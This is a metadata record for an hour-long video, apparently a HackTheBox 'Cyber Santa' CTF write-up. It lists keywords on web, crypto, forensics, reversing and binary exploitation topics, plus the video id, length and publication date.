Keywords: Cyber Santa, HackTheBox, Hack The Box, HTB, Capture The Flag, CTF, base64, PCAP, Wireshark, traffic analysis, APT, SQLMap, SQLi, blind sql, Affine, known-plaintext, UPX, packed binary, buffer overflow, ret2win, binary exploitation, pwn, exploit, pwntools, pwndbg, GDB, checksec, canary, PIE, GOT, libc, python, strace, ltrace, debugging, static analyis, dynamic analysis, offsec, radare, r2, crypto, reversing, forensics, DFIR, ethical hacking, web exploit, pentesting, pen-test, bug bounty, writeup, cyberchef, GCHQ, IDA, xmas

Id: deg0CQwwN-M

Channel Id: undefined

Length: 60min 59sec (3659 seconds)

Published: Mon Dec 06 2021